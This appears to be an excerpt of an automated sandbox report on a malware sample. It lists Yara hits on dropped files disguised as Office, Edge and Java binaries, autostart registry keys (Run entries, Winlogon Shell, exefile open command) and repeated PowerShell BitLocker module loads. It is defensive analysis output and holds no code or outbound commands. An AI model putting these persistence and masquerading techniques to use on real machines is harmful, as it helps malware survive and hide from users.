Source: Yara match	File source: C:\Program Files (x86)\Microsoft Office\root\Office16\AppSharingHookController.exe, type: DROPPED
Source: Yara match	File source: C:\Program Files (x86)\Microsoft Office\root\Office16\DCF\DATABASECOMPARE.EXE, type: DROPPED
Source: Yara match	File source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE, type: DROPPED
Source: Yara match	File source: C:\Program Files (x86)\Microsoft Office\root\Office16\CLVIEW.EXE, type: DROPPED
Source: Yara match	File source: C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe.exe, type: DROPPED
Source: Yara match	File source: C:\Windows\svchost.com, type: DROPPED
Source: Yara match	File source: C:\Program Files (x86)\Microsoft Office\root\Office16\MSOSREC.EXE, type: DROPPED
Source: Yara match	File source: C:\Program Files (x86)\Microsoft Office\root\Office16\msoasb.exe, type: DROPPED
Source: Yara match	File source: C:\Program Files (x86)\Microsoft Office\root\Office16\Wordconv.exe, type: DROPPED
Source: Yara match	File source: C:\Program Files (x86)\Microsoft Office\Office16\OSPPREARM.EXE, type: DROPPED
Source: Yara match	File source: C:\Program Files (x86)\Microsoft Office\root\vfs\Windows\Installer\{90160000-000F-0000-0000-0000000FF1CE}\joticon.exe, type: DROPPED
Source: Yara match	File source: C:\Program Files (x86)\Microsoft Office\root\Office16\SkypeSrv\SKYPESERVER.EXE, type: DROPPED
Source: Yara match	File source: C:\Program Files (x86)\Microsoft Office\root\vfs\Windows\Installer\{90160000-000F-0000-0000-0000000FF1CE}\accicons.exe, type: DROPPED
Source: Yara match	File source: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\java.exe, type: DROPPED
Source: Yara match	File source: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX86\Microsoft Shared\Office16\OLicenseHeartbeat.exe, type: DROPPED
Source: Yara match	File source: C:\Program Files (x86)\AutoIt3\AutoIt3Help.exe, type: DROPPED
Source: Yara match	File source: C:\Program Files (x86)\Microsoft Office\root\Office16\MSQRY32.EXE, type: DROPPED
Source: Yara match	File source: C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeUpdate.exe, type: DROPPED
Source: Yara match	File source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\pwahelper.exe, type: DROPPED
Source: Yara match	File source: C:\Program Files (x86)\Microsoft Office\root\Office16\DCF\SPREADSHEETCOMPARE.EXE, type: DROPPED
Source: Yara match	File source: C:\Program Files (x86)\Microsoft Office\root\Office16\OfficeScrBroker.exe, type: DROPPED
Source: Yara match	File source: C:\Program Files (x86)\AutoIt3\AutoIt3_x64.exe, type: DROPPED
Source: Yara match	File source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARMHelper.exe, type: DROPPED
Source: Yara match	File source: C:\Program Files (x86)\Microsoft Office\root\Office16\POWERPNT.EXE, type: DROPPED
Source: Yara match	File source: C:\Program Files (x86)\Microsoft Office\root\Office16\SELFCERT.EXE, type: DROPPED
Source: Yara match	File source: C:\Program Files (x86)\Microsoft Office\root\Office16\MSOHTMED.EXE, type: DROPPED
Source: Yara match	File source: C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe, type: DROPPED
Source: Yara match	File source: C:\Program Files (x86)\Microsoft Office\root\Office16\OcPubMgr.exe, type: DROPPED
Source: Yara match	File source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\msedge_pwa_launcher.exe, type: DROPPED
Source: Yara match	File source: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Office16\ai.exe, type: DROPPED
Source: Yara match	File source: C:\Program Files (x86)\Microsoft Office\root\Office16\WORDICON.EXE, type: DROPPED
Source: Yara match	File source: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesX64\Microsoft Office\Office16\AppSharingHookController64.exe, type: DROPPED
Source: Yara match	File source: C:\Program Files (x86)\Java\jre-1.8\bin\jp2launcher.exe, type: DROPPED
Source: Yara match	File source: C:\Program Files (x86)\Microsoft Office\root\Office16\ADDINS\Microsoft Power Query for Excel Integrated\bin\Microsoft.Mashup.Container.Loader.exe, type: DROPPED
Source: Yara match	File source: C:\Program Files (x86)\Microsoft Office\root\vfs\Windows\Installer\{90160000-000F-0000-0000-0000000FF1CE}\dbcicons.exe, type: DROPPED
Source: Yara match	File source: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateComRegisterShell64.exe, type: DROPPED
Source: Yara match	File source: C:\ProgramData\Package Cache\{8bdfe669-9705-4184-9368-db9ce581e0e7}\VC_redist.x64.exe, type: DROPPED
Source: Yara match	File source: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\javaws.exe, type: DROPPED
Source: Yara match	File source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\identity_helper.exe, type: DROPPED
Source: Yara match	File source: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX86\Microsoft Shared\Source Engine\OSE.EXE, type: DROPPED
Source: Yara match	File source: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdate.exe, type: DROPPED
Source: Yara match	File source: C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.23080.2006-0\MpCopyAccelerator.exe, type: DROPPED
Source: Yara match	File source: C:\Program Files (x86)\Microsoft Office\root\Office16\SCANPST.EXE, type: DROPPED
Source: Yara match	File source: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\javaw.exe, type: DROPPED
Source: Yara match	File source: C:\Program Files (x86)\Microsoft Office\root\Office16\ORGCHART.EXE, type: DROPPED
Source: Yara match	File source: C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.23080.2006-0\MpCmdRun.exe, type: DROPPED
Source: Yara match	File source: C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.23080.2006-0\MsMpEng.exe, type: DROPPED
Source: Yara match	File source: C:\Program Files (x86)\Microsoft Office\root\Office16\PPTICO.EXE, type: DROPPED
Source: Yara match	File source: C:\Program Files (x86)\Microsoft Office\root\Office16\ONENOTE.EXE, type: DROPPED
Source: Yara match	File source: C:\Program Files (x86)\Microsoft Office\root\Office16\GRAPH.EXE, type: DROPPED
Source: Yara match	File source: C:\Users\user\AppData\Local\Temp\chrome.exe, type: DROPPED
Source: Yara match	File source: C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeUpdateCore.exe, type: DROPPED
Source: Yara match	File source: C:\Program Files (x86)\Microsoft Office\root\Office16\officeappguardwin32.exe, type: DROPPED
Source: Yara match	File source: C:\Program Files (x86)\Microsoft Office\root\Office16\PerfBoost.exe, type: DROPPED
Source: Yara match	File source: C:\Program Files (x86)\Microsoft Office\root\vfs\Windows\Installer\{90160000-000F-0000-0000-0000000FF1CE}\wordicon.exe, type: DROPPED
Source: Yara match	File source: C:\Program Files (x86)\AutoIt3\Au3Check.exe, type: DROPPED
Source: Yara match	File source: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesX86\Microsoft Analysis Services\AS OLEDB\140\SQLDumper.exe, type: DROPPED
Source: Yara match	File source: C:\Program Files (x86)\Microsoft Office\root\Office16\DCF\Common.DBConnection.exe, type: DROPPED
Source: Yara match	File source: C:\Program Files (x86)\Microsoft Office\root\Office16\VPREVIEW.EXE, type: DROPPED
Source: Yara match	File source: C:\Program Files (x86)\Windows Defender\SearchIndexer.exe, type: DROPPED
Source: Yara match	File source: C:\Program Files (x86)\Microsoft Office\root\Office16\OfficeScrSanBroker.exe, type: DROPPED
Source: Yara match	File source: C:\Program Files (x86)\AutoIt3\Au3Info.exe, type: DROPPED
Source: Yara match	File source: C:\Program Files (x86)\AutoIt3\Aut2Exe\upx.exe, type: DROPPED
Source: Yara match	File source: C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeComRegisterShellARM64.exe, type: DROPPED
Source: Yara match	File source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe, type: DROPPED
Source: Yara match	File source: C:\Program Files (x86)\Java\jre-1.8\bin\javacpl.exe, type: DROPPED
Source: Yara match	File source: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX86\Microsoft Shared\Office16\MSOICONS.EXE, type: DROPPED
Source: Yara match	File source: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateCore.exe, type: DROPPED
Source: Yara match	File source: C:\Program Files (x86)\Microsoft Office\root\Office16\DCF\filecompare.exe, type: DROPPED
Source: Yara match	File source: C:\Program Files (x86)\Microsoft Office\root\vfs\Windows\Installer\{90160000-000F-0000-0000-0000000FF1CE}\sscicons.exe, type: DROPPED
Source: Yara match	File source: C:\Program Files (x86)\Microsoft Office\root\Office16\lync99.exe, type: DROPPED
Source: Yara match	File source: C:\Program Files (x86)\Microsoft Office\root\Office16\IEContentService.exe, type: DROPPED
Source: Yara match	File source: C:\Program Files (x86)\Common Files\Java\Java Update\jaureg.exe, type: DROPPED
Source: Yara match	File source: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Office16\MSOXMLED.EXE, type: DROPPED
Source: Yara match	File source: C:\Program Files (x86)\Microsoft Office\root\vfs\Windows\Installer\{90160000-000F-0000-0000-0000000FF1CE}\outicon.exe, type: DROPPED
Source: Yara match	File source: C:\Program Files (x86)\Microsoft Office\root\Office16\ONENOTEM.EXE, type: DROPPED
Source: Yara match	File source: C:\Program Files (x86)\Microsoft Office\root\Office16\NAMECONTROLSERVER.EXE, type: DROPPED
Source: Yara match	File source: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleCrashHandler.exe, type: DROPPED
Source: Yara match	File source: C:\Program Files (x86)\Microsoft Office\root\Office16\UcMapi.exe, type: DROPPED
Source: Yara match	File source: C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeUpdateSetup.exe, type: DROPPED
Source: Yara match	File source: C:\Program Files (x86)\Microsoft Office\root\vfs\Windows\Installer\{90160000-000F-0000-0000-0000000FF1CE}\grv_icons.exe, type: DROPPED
Source: Yara match	File source: C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.23080.2006-0\mpextms.exe, type: DROPPED
Source: Yara match	File source: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe, type: DROPPED
Source: Yara match	File source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\notification_click_helper.exe, type: DROPPED
Source: Yara match	File source: C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeUpdateBroker.exe, type: DROPPED
Source: Yara match	File source: C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.23080.2006-0\ConfigSecurityPolicy.exe, type: DROPPED
Source: Yara match	File source: C:\Program Files (x86)\Microsoft Office\root\Office16\SETLANG.EXE, type: DROPPED
Source: Yara match	File source: C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeUpdateOnDemand.exe, type: DROPPED
Source: Yara match	File source: C:\Program Files (x86)\Microsoft Office\root\vfs\Windows\Installer\{90160000-000F-0000-0000-0000000FF1CE}\lyncicon.exe, type: DROPPED
Source: Yara match	File source: C:\Program Files (x86)\Microsoft Office\root\vfs\Windows\Installer\{90160000-000F-0000-0000-0000000FF1CE}\xlicons.exe, type: DROPPED
Source: Yara match	File source: C:\Program Files (x86)\AutoIt3\Au3Info_x64.exe, type: DROPPED
Source: Yara match	File source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\msedge_proxy.exe, type: DROPPED
Source: Yara match	File source: C:\Program Files (x86)\Windows Multimedia Platform\tAVtSoJGTaCxrZiXcJn.exe, type: DROPPED
Source: Yara match	File source: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX86\Microsoft Shared\Office16\FLTLDR.EXE, type: DROPPED
Source: Yara match	File source: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateBroker.exe, type: DROPPED
Source: Yara match	File source: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe, type: DROPPED
Source: Yara match	File source: C:\Program Files (x86)\Microsoft Office\root\Client\AppVDllSurrogate.exe, type: DROPPED
Source: Yara match	File source: C:\Program Files (x86)\Microsoft Office\root\vfs\Windows\Installer\{90160000-000F-0000-0000-0000000FF1CE}\osmclienticon.exe, type: DROPPED
Source: Yara match	File source: C:\Program Files (x86)\Microsoft Office\root\Client\AppVDllSurrogate32.exe, type: DROPPED
Source: Yara match	File source: C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeUpdateComRegisterShell64.exe, type: DROPPED
Source: Yara match	File source: C:\Program Files (x86)\Microsoft Office\root\vfs\Windows\Installer\{90160000-000F-0000-0000-0000000FF1CE}\pptico.exe, type: DROPPED
Source: Yara match	File source: C:\Program Files (x86)\Microsoft Office\root\vfs\Windows\Installer\{90160000-000F-0000-0000-0000000FF1CE}\visicon.exe, type: DROPPED
Source: Yara match	File source: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateOnDemand.exe, type: DROPPED
Source: Yara match	File source: C:\Program Files (x86)\Microsoft Office\root\vfs\Windows\Installer\{90160000-000F-0000-0000-0000000FF1CE}\pubs.exe, type: DROPPED
Source: Yara match	File source: C:\Program Files (x86)\Microsoft Office\root\Client\AppVLP.exe, type: DROPPED
Source: Yara match	File source: C:\Program Files (x86)\Microsoft Office\root\Office16\msoadfsb.exe, type: DROPPED
Source: Yara match	File source: C:\Program Files (x86)\Microsoft Office\root\Office16\OLCFG.EXE, type: DROPPED
Source: Yara match	File source: C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.23080.2006-0\NisSrv.exe, type: DROPPED
Source: Yara match	File source: C:\Program Files (x86)\Microsoft Office\root\vfs\Windows\Installer\{90160000-000F-0000-0000-0000000FF1CE}\pj11icon.exe, type: DROPPED
Source: Yara match	File source: C:\Program Files (x86)\Common Files\Microsoft Shared\OFFICE16\LICLUA.EXE, type: DROPPED
Source: Yara match	File source: C:\Program Files (x86)\Microsoft Office\root\Office16\ACCICONS.EXE, type: DROPPED
Source: Yara match	File source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\BHO\ie_to_edge_stub.exe, type: DROPPED
Source: Yara match	File source: C:\Program Files (x86)\Microsoft Office\root\Office16\XLICONS.EXE, type: DROPPED
Source: Yara match	File source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\msedge.exe, type: DROPPED
Source: Yara match	File source: C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe_x64.exe, type: DROPPED
Source: Yara match	File source: C:\Program Files (x86)\Common Files\Java\Java Update\jucheck.exe, type: DROPPED
Source: Yara match	File source: C:\ProgramData\Microsoft\ClickToRun\{9AC08E99-230B-47e8-9721-4577B7F124EA}\integrator.exe, type: DROPPED
Source: Yara match	File source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\msedgewebview2.exe, type: DROPPED
Source: Yara match	File source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\Installer\setup.exe, type: DROPPED
Source: Yara match	File source: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\OfficeSoftwareProtectionPlatform\OSPPSVC.EXE, type: DROPPED
Source: Yara match	File source: C:\Program Files (x86)\Microsoft Office\root\Integration\Integrator.exe, type: DROPPED

Creates an autostart registry key pointing to binary in C:\Windows

Source: C:\Users\user\AppData\Local\Temp\3582-490\SearchIndexer.exe

Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run tAVtSoJGTaCxrZiXcJn

Jump to behavior

Creates an undocumented autostart registry key

Source: C:\Users\user\Desktop\SearchIndexer.exe	Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\exefile\shell\open\command NULL	Jump to behavior
Source: C:\Users\user\Desktop\SearchIndexer.exe	Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\exefile\shell\open\command NULL	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\3582-490\SearchIndexer.exe	Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon Shell	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\3582-490\SearchIndexer.exe	Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon Shell	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\3582-490\SearchIndexer.exe	Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon Shell	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\3582-490\SearchIndexer.exe	Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon Shell	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\3582-490\SearchIndexer.exe	Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon Shell	Jump to behavior

Creates multiple autostart registry keys

Source: C:\Users\user\AppData\Local\Temp\3582-490\SearchIndexer.exe	Registry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run RuntimeBroker	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\3582-490\SearchIndexer.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run tAVtSoJGTaCxrZiXcJn	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\3582-490\SearchIndexer.exe	Registry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run SearchIndexer	Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\3582-490\SearchIndexer.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run tAVtSoJGTaCxrZiXcJn	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\3582-490\SearchIndexer.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run tAVtSoJGTaCxrZiXcJn	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\3582-490\SearchIndexer.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run RuntimeBroker	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\3582-490\SearchIndexer.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run RuntimeBroker	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\3582-490\SearchIndexer.exe	Registry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run RuntimeBroker	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\3582-490\SearchIndexer.exe	Registry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run RuntimeBroker	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\3582-490\SearchIndexer.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run SearchIndexer	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\3582-490\SearchIndexer.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run SearchIndexer	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\3582-490\SearchIndexer.exe	Registry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run SearchIndexer	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\3582-490\SearchIndexer.exe	Registry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run SearchIndexer	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\3582-490\SearchIndexer.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run tAVtSoJGTaCxrZiXcJn	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\3582-490\SearchIndexer.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run tAVtSoJGTaCxrZiXcJn	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\3582-490\SearchIndexer.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run tAVtSoJGTaCxrZiXcJn	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\3582-490\SearchIndexer.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run tAVtSoJGTaCxrZiXcJn	Jump to behavior

Hooking and other Techniques for Hiding and Protection

Loading BitLocker PowerShell Module

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
